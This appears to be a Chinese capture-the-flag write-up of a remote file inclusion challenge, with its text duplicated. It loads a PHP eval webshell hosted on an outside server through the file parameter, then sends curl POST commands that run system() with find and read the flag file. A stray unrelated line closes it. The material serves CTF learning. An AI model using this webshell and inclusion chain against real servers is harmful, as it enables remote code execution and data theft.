构造 GET 请求通过file参数远程加载公网服务器上的shell.txt靶机通过 HTTP 请求拉取远程 txt 文件内容include将其解析为 PHP 一句话木马以 POST 方式向该页面传入data参数写入系统命令 / PHP 文件读取函数执行命令读取服务器 Flag 文件。访问https://learncpp.top/download/shell.txt文件内容为 PHP 一句话木马?php eval($_POST[data]); ?1.访问 Payload 地址触发远程文件包含部署 webshellhttp://180.76.235.121:33360/?filehttps://learncpp.top/download/shell.txt2.全局搜索服务器内所有 Flag 相关文件通过find命令全盘检索文件名包含flag的文件过滤错误输出curl -X POST -d datasystem(find / -name \flag*\ 2/dev/null); http://180.76.235.121:33360/?filehttps://learncpp.top/download/shell.txt检索结果3.执行这条 curl 命令用 PHP 函数读取文件直接输出curl -X POST -d dataecho file_get_contents(/flag_66a615849.txt); http://180.76.235.121:33360/?filehttps://learncpp.top/download/shell.txt
文件包含题-include
发布时间:2026/6/25 18:56:35
构造 GET 请求通过file参数远程加载公网服务器上的shell.txt靶机通过 HTTP 请求拉取远程 txt 文件内容include将其解析为 PHP 一句话木马以 POST 方式向该页面传入data参数写入系统命令 / PHP 文件读取函数执行命令读取服务器 Flag 文件。访问https://learncpp.top/download/shell.txt文件内容为 PHP 一句话木马?php eval($_POST[data]); ?1.访问 Payload 地址触发远程文件包含部署 webshellhttp://180.76.235.121:33360/?filehttps://learncpp.top/download/shell.txt2.全局搜索服务器内所有 Flag 相关文件通过find命令全盘检索文件名包含flag的文件过滤错误输出curl -X POST -d datasystem(find / -name \flag*\ 2/dev/null); http://180.76.235.121:33360/?filehttps://learncpp.top/download/shell.txt检索结果3.执行这条 curl 命令用 PHP 函数读取文件直接输出curl -X POST -d dataecho file_get_contents(/flag_66a615849.txt); http://180.76.235.121:33360/?filehttps://learncpp.top/download/shell.txt
:Windows/macOS/Linux三端差异、签名验证失败、ARM64架构兼容性全解)
